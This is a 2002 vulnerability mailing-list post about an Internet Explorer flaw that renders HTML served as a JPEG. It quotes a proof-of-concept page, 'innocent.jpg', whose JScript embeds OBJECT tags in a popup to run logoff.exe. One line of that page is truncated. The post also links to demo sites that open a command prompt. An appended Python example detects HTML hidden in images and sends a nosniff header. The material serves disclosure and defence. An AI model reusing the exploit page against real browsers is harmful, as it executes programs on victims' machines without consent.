Vulnerability Development mailing list archives
FW: [Re: Rather large MSIE-hole] another variant
From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 17:49:31 -0600
[magnus () bodin org] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:
The latest MSIE-hole is now spreading.

THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the Content-Type if it "thinks" it knows better, then the code is executed.

This in combination with the malicious code that is possible to run, then an "innocent.jpg" with the following content will log off an XP-user.

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
var programName=new Array(
    'c:/windows/system32/logoff.exe',
    'c:/winxp/system32/logoff.exe',
    'c:/winnt/system32/logoff.exe'
);
function Init(){
    var oPopup=window.createPopup();
    var oPopBody=oPopup.document.body;
    var n,html='';
    for(n=0;n<programName.length;n++)
        html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    oPopBody.innerHTML=html;
    oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----

--
magnus
MICROS~1 BOB was written in Lisp.
http://x42.com/

Just passing this along, as some may not be on the sec-basics list.

-----Original Message-----
From: Sprissler, Noah [mailto:NSPRISSLER () PARTNERS ORG]
Sent: March 12, 2002 10:31
To: security-basics () security-focus com
Subject: RE: scary site

That's interesting. I have disabled active scripting as most have suggested and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS prompt. However, if I go to this link from Greymagic http://security.greymagic.com/adv/gm001-ie/simplebind.html their implementation of this works fine no matter what settings I disable. Win2k with all patches, IE6 with all patches.

-Noah

-----Original Message-----

--
- nocon
======================================
nocon () darkflame net
http://nocon.darkflame.net
======================================
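
The quoted message turns on MSIE preferring its own guess over the served Content-Type. As an added example (not part of the original posts), here is a server-side check that flags a file declared as an image whose leading bytes are HTML, plus the response header that tells later browsers (IE8 onward) not to sniff. The token list, the 256-byte window and all function names are assumptions made for the example.

```python
import re

# Magic-byte prefixes for the image types a server might declare.
IMAGE_MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

# Markup tokens that a content-sniffing browser may take as evidence of HTML.
# Assumed list for this example, not IE's actual sniffing table.
HTML_HINT = re.compile(
    rb"<\s*(!doctype\s+html|html|head|body|script|object|iframe|meta|title)\b",
    re.IGNORECASE,
)

SNIFF_WINDOW = 256  # assumed number of leading bytes to inspect


def classify(declared_type: str, body: bytes) -> str:
    """Return 'ok', 'mismatch' or 'html-in-image' for a served or uploaded file."""
    declared = declared_type.split(";")[0].strip().lower()
    magics = IMAGE_MAGIC.get(declared)
    if magics is None:
        return "ok"  # not an image type this check covers
    head = body[:SNIFF_WINDOW]
    if HTML_HINT.search(head):
        return "html-in-image"  # markup near the start, even behind valid magic
    if not head.startswith(magics):
        return "mismatch"  # declared image type, but wrong signature
    return "ok"


def response_headers(declared_type: str) -> dict:
    """Headers asking sniffing-capable browsers to honour the declared type."""
    return {"Content-Type": declared_type, "X-Content-Type-Options": "nosniff"}


# Constructed samples: a minimal JPEG header and an HTML page named like an image.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
FAKE_JPEG = b'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML>'

if __name__ == "__main__":
    for name, body in (("real.jpg", REAL_JPEG), ("innocent.jpg", FAKE_JPEG)):
        print(name, classify("image/jpeg", body), response_headers("image/jpeg"))
```

The same check can run in an upload handler or in a proxy that inspects responses before they reach a sniffing client.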